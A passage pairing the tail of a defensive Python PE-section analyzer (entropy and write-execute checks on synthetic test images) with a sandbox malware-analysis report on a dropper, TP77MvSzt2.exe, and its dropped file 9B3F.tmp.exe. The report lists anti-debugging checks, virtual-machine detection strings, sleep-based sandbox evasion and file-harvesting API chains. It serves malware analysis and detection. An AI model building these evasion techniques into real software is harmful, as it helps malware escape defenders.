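    for i in range(n_sections):
        name, _vsize, _vaddr, raw_size, raw_ptr, _, _, _, _, chars = struct.unpack_from("<8sIIIIIIHHI", pe, table + 40 * i)
        data = pe[raw_ptr:raw_ptr + raw_size]
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"), "rights": perms(chars),
                         "characteristics": chars, "entropy": round(shannon_entropy(data), 3)})
    return file_chars, sections


def analyze(pe):
    file_chars, sections = parse_pe(pe)
    findings = []
    for s in sections:
        c = s["characteristics"]
        if c & SCN_MEM_EXECUTE and c & SCN_MEM_WRITE:
            findings.append(f"{s['name']}: writable and executable (self-modifying code or an unpacking stub)")
        if c & SCN_MEM_EXECUTE and s["entropy"] >= ENTROPY_PACKED:
            findings.append(f"{s['name']}: executable section with entropy {s['entropy']} looks packed or encrypted")
        if s["name"] not in STANDARD_NAMES:
            findings.append(f"{s['name']}: non-standard section name")
    return {"file_characteristics": [n for f, n in FILE_FLAGS if file_chars & f], "sections": sections, "findings": findings}


def build_pe(sections, file_chars=0x0001 | 0x0002 | 0x0100):
    """Assemble a minimal, non-loadable PE32 image from (name, flags, data) triples (constructed test input)."""
    opt_size, align, e_lfanew = 224, 0x200, 0x40
    raw_ptr = -(-(e_lfanew + 24 + opt_size + 40 * len(sections)) // align) * align
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, file_chars)
    opt = struct.pack("<H", 0x10B) + b"\0" * (opt_size - 2)          # PE32 magic, the rest zeroed
    table, body, vaddr = b"", b"", 0x1000
    for name, flags, data in sections:
        size = -(-len(data) // align) * align
        table += struct.pack("<8sIIIIIIHHI", name.encode().ljust(8, b"\0"), len(data), vaddr, size,
                             raw_ptr + len(body), 0, 0, 0, 0, flags)
        body += data.ljust(size, b"\0")
        vaddr += max(size, 0x1000)
    dos = b"MZ".ljust(0x3C, b"\0") + struct.pack("<I", e_lfanew)
    return (dos + b"PE\0\0" + coff + opt + table).ljust(raw_ptr, b"\0") + body


_rng = random.Random(1542870)          # seeded so the run is reproducible


def _random_code(n):
    """Stand-in for packed code: uniformly random bytes have entropy close to 8."""
    return bytes(_rng.getrandbits(8) for _ in range(n))


SAMPLE_PE = build_pe([
    (".text", SCN_CNT_CODE | SCN_MEM_EXECUTE | SCN_MEM_READ, _random_code(4096)),
    (".rdata", SCN_CNT_INITIALIZED_DATA | SCN_MEM_READ, b"Hello, world! " * 100),
    (".data", SCN_CNT_INITIALIZED_DATA | SCN_MEM_READ | SCN_MEM_WRITE, b"\0" * 1024),
    (".sohumi", SCN_CNT_INITIALIZED_DATA | SCN_MEM_READ | SCN_MEM_WRITE, b"\x00\x01" * 256),
])
# Mimics the on-disk layout the report shows for 9B3F.tmp.exe: .text is both E and W.
STUB_PE = build_pe([
    (".text", SCN_CNT_CODE | SCN_MEM_EXECUTE | SCN_MEM_WRITE | SCN_MEM_READ, _random_code(2048)),
    (".reloc", SCN_CNT_INITIALIZED_DATA | SCN_MEM_READ, b"\0" * 64),
])

if __name__ == "__main__":
    for label, image in (("TP77MvSzt2-like", SAMPLE_PE), ("9B3F.tmp-like", STUB_PE)):
        r = analyze(image)
        print(label, ", ".join(r["file_characteristics"]))
        for s in r["sections"]:
            print(f"  {s['name']:8} {s['rights']:3} entropy={s['entropy']}")
        for f in r["findings"]:
            print("  !", f)
```

To run this on a real sample, replace `SAMPLE_PE` with `open(path, "rb").read()`; the same `analyze` call works on the files the report names, and the on-disk `.text:EW` row for 9B3F.tmp.exe is exactly the writable-and-executable finding.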
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeFile created: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeJump to dropped file
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exeJump to dropped file
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_0040E999 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0040E999
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess | graph_1-26329
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exe | Window / User API: threadDelayed 3961
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exe | Window / User API: threadDelayed 6032
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exe | Evaded block: after key decision | graph_1-27490
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes | graph_0-63723
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exe | API coverage: 5.1 %
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exe | API coverage: 6.5 %
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exe TID: 4600 | Thread sleep count: 3961 > 30
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exe TID: 4600 | Thread sleep time: -2816271s >= -30000s
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exe TID: 4600 | Thread sleep count: 6032 > 30
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exe TID: 4600 | Thread sleep time: -4288752s >= -30000s
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exe | Last function: Thread delayed
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exe | Code function: 1_2_0040E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,1_2_0040E430
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exe | Code function: 1_2_004138B0 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,1_2_004138B0
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exe | Code function: 1_2_00414570 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,1_2_00414570
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exe | Code function: 1_2_00414910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_00414910
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exe | Code function: 1_2_0040ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,1_2_0040ED20
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exe | Code function: 1_2_0040BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,1_2_0040BE70
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exe | Code function: 1_2_0040DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_0040DE10
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exe | Code function: 1_2_004016D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_004016D0
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exe | Code function: 1_2_0040DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,1_2_0040DA80
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exe | Code function: 1_2_00413EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,1_2_00413EA0
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exe | Code function: 1_2_0040F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_0040F6B0
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exe | Code function: 1_2_00B0DCE7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,1_2_00B0DCE7
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exe | Code function: 1_2_00B0C0D7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,1_2_00B0C0D7
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exe | Code function: 1_2_00B0E077 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_00B0E077
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exe | Code function: 1_2_00B01937 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_00B01937
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exe | Code function: 1_2_00B0F917 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_00B0F917
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exe | Code function: 1_2_00B14107 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,1_2_00B14107
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exe | Code function: 1_2_00B0E697 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,1_2_00B0E697
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exe | Code function: 1_2_00B0EF87 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,1_2_00B0EF87
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exe | Code function: 1_2_00B147D7 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,1_2_00B147D7
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exe | Code function: 1_2_00B13B17 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,1_2_00B13B17
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exe | Code function: 1_2_00B14B77 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_00B14B77
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exe | Code function: 1_2_00401160 GetSystemInfo,ExitProcess,1_2_00401160
                    Source: Amcache.hve.7.dr | Binary or memory string: VMware
                    Source: Amcache.hve.7.dr | Binary or memory string: VMware Virtual USB Mouse
                    Source: Amcache.hve.7.dr | Binary or memory string: vmci.syshbin
                    Source: Amcache.hve.7.dr | Binary or memory string: VMware, Inc.
                    Source: Amcache.hve.7.dr | Binary or memory string: VMware20,1hbin@
                    Source: TP77MvSzt2.exe, 00000000.00000002.4211079522.0000000002E09000.00000004.00000020.00020000.00000000.sdmp, TP77MvSzt2.exe, 00000000.00000003.4081243574.0000000002E08000.00000004.00000020.00020000.00000000.sdmp, 9B3F.tmp.exe, 00000001.00000002.2966895028.0000000000903000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWp
                    Source: Amcache.hve.7.dr | Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                    Source: Amcache.hve.7.dr | Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                    Source: Amcache.hve.7.dr | Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                    Source: TP77MvSzt2.exe, 00000000.00000002.4211126136.0000000002E37000.00000004.00000020.00020000.00000000.sdmp, TP77MvSzt2.exe, 00000000.00000003.4081032702.0000000002E37000.00000004.00000020.00020000.00000000.sdmp, 9B3F.tmp.exe, 00000001.00000002.2966895028.0000000000954000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                    Source: Amcache.hve.7.dr | Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                    Source: Amcache.hve.7.dr | Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                    Source: 9B3F.tmp.exe, 00000001.00000002.2966895028.0000000000903000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware={
                    Source: Amcache.hve.7.dr | Binary or memory string: c:/windows/system32/drivers/vmci.sys
                    Source: Amcache.hve.7.dr | Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                    Source: Amcache.hve.7.dr | Binary or memory string: vmci.sys
                    Source: Amcache.hve.7.dr | Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                    Source: Amcache.hve.7.dr | Binary or memory string: vmci.syshbin`
                    Source: Amcache.hve.7.dr | Binary or memory string: \driver\vmci,\driver\pci
                    Source: Amcache.hve.7.dr | Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                    Source: Amcache.hve.7.dr | Binary or memory string: VMware20,1
                    Source: Amcache.hve.7.dr | Binary or memory string: Microsoft Hyper-V Generation Counter
                    Source: Amcache.hve.7.dr | Binary or memory string: NECVMWar VMware SATA CD00
                    Source: Amcache.hve.7.dr | Binary or memory string: VMware Virtual disk SCSI Disk Device
                    Source: 9B3F.tmp.exe, 00000001.00000002.2966895028.0000000000903000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware
                    Source: Amcache.hve.7.dr | Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                    Source: Amcache.hve.7.dr | Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                    Source: Amcache.hve.7.dr | Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                    Source: Amcache.hve.7.dr | Binary or memory string: VMware PCI VMCI Bus Device
                    Source: Amcache.hve.7.dr | Binary or memory string: VMware VMCI Bus Device
                    Source: Amcache.hve.7.dr | Binary or memory string: VMware Virtual RAM
                    Source: Amcache.hve.7.dr | Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                    Source: Amcache.hve.7.dr | Binary or memory string: vmci.inf_amd64_68ed49469341f563
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exe | API call chain: ExitProcess graph end node | graph_1-26314
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exe | API call chain: ExitProcess graph end node | graph_1-26317
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exe | API call chain: ExitProcess graph end node | graph_1-26335
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exe | API call chain: ExitProcess graph end node | graph_1-26327
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exe | API call chain: ExitProcess graph end node | graph_1-26200
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exe | API call chain: ExitProcess graph end node | graph_1-26156
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exe | API call chain: ExitProcess graph end node | graph_1-26357
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exe | Code function: 0_2_0042A3F3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0042A3F3
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exe | Code function: 1_2_004045C0 VirtualProtect ?,00000004,00000100,00000000 1_2_004045C0
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exe | Code function: 0_2_0041EC7E LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0041EC7E
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exe | Code function: 0_2_0042FE7F mov eax, dword ptr fs:[00000030h] 0_2_0042FE7F
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exe | Code function: 0_2_02DA9F83 push dword ptr fs:[00000030h] 0_2_02DA9F83
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exe | Code function: 0_2_048600E6 mov eax, dword ptr fs:[00000030h] 0_2_048600E6
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exe | Code function: 0_2_04830D90 mov eax, dword ptr fs:[00000030h] 0_2_04830D90
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exe | Code function: 0_2_0483092B mov eax, dword ptr fs:[00000030h] 0_2_0483092B
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exe | Code function: 1_2_00419750 mov eax, dword ptr fs:[00000030h] 1_2_00419750
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exe | Code function: 1_2_008D9823 push dword ptr fs:[00000030h] 1_2_008D9823
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exe | Code function: 1_2_00B199B7 mov eax, dword ptr fs:[00000030h] 1_2_00B199B7
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exe | Code function: 1_2_00B00D90 mov eax, dword ptr fs:[00000030h] 1_2_00B00D90
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exe | Code function: 1_2_00B0092B mov eax, dword ptr fs:[00000030h] 1_2_00B0092B
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exe | Code function: 0_2_0043BBE1 GetProcessHeap,0_2_0043BBE1
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exe | Code function: 0_2_0042A3F3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0042A3F3
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exe | Code function: 0_2_004104F3 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_004104F3
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exe | Code function: 0_2_00410686 SetUnhandledExceptionFilter,0_2_00410686
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exe | Code function: 0_2_0040F936 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0040F936
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exe | Code function: 0_2_0485A65A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0485A65A
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exe | Code function: 0_2_0484075A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0484075A
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exe | Code function: 0_2_048408ED SetUnhandledExceptionFilter,0_2_048408ED
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exe | Code function: 0_2_0483FB9D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0483FB9D
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exe | Code function: 1_2_0041AD48 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_0041AD48
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exe | Code function: 1_2_0041CEEA SetUnhandledExceptionFilter,1_2_0041CEEA
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exe | Code function: 1_2_0041B33A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_0041B33A
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exe | Code function: 1_2_00B1B5A1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00B1B5A1
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exe | Code function: 1_2_00B1D151 SetUnhandledExceptionFilter,1_2_00B1D151
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exe | Code function: 1_2_00B1AFAF memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00B1AFAF
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exe | Memory protected: page guard

                    HIPS / PFW / Operating System Protection Evasion

                    Source: Yara match | File source: Process Memory Space: 9B3F.tmp.exe PID: 5440, type: MEMORYSTR
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exe | Code function: 1_2_00419600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,1_2_00419600
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exe | Code function: 1_2_00B19867 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,1_2_00B19867
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exe | Process created: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exe "C:\Users\user\AppData\Local\Temp\9B3F.tmp.exe"
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exe | Code function: 0_2_0041079B cpuid 0_2_0041079B
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exe | Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_0043B02A
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exe | Code function: GetLocaleInfoW,0_2_004351E0
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exe | Code function: EnumSystemLocalesW,0_2_0043B2ED
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exe | Code function: EnumSystemLocalesW,0_2_0043B2A2
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exe | Code function: EnumSystemLocalesW,0_2_0043B388
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_0043B415
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exe | Code function: GetLocaleInfoW,0_2_0043B665
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_0043B78E
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exe | Code function: GetLocaleInfoW,0_2_0043B895
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_0043B962
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exe | Code function: EnumSystemLocalesW,0_2_00434DED
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exe | Code function: GetLocaleInfoW,0_2_04865447
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exe | Code function: EnumSystemLocalesW,0_2_0486B5EF
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exe | Code function: EnumSystemLocalesW,0_2_0486B509
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exe | Code function: EnumSystemLocalesW,0_2_0486B554
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exe | Code function: EnumSystemLocalesW,0_2_04865054
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exe | Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_0486B291
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exe | Code function: GetLocaleInfoW,0_2_0486B8CC
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_0486B9F5
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exe | Code function: GetLocaleInfoW,0_2_0486BAFC
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_0486BBC9
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exe | Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,1_2_00417B90
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exe | Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,1_2_00B17DF7
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exe | Queries volume information: C:\ VolumeInformation
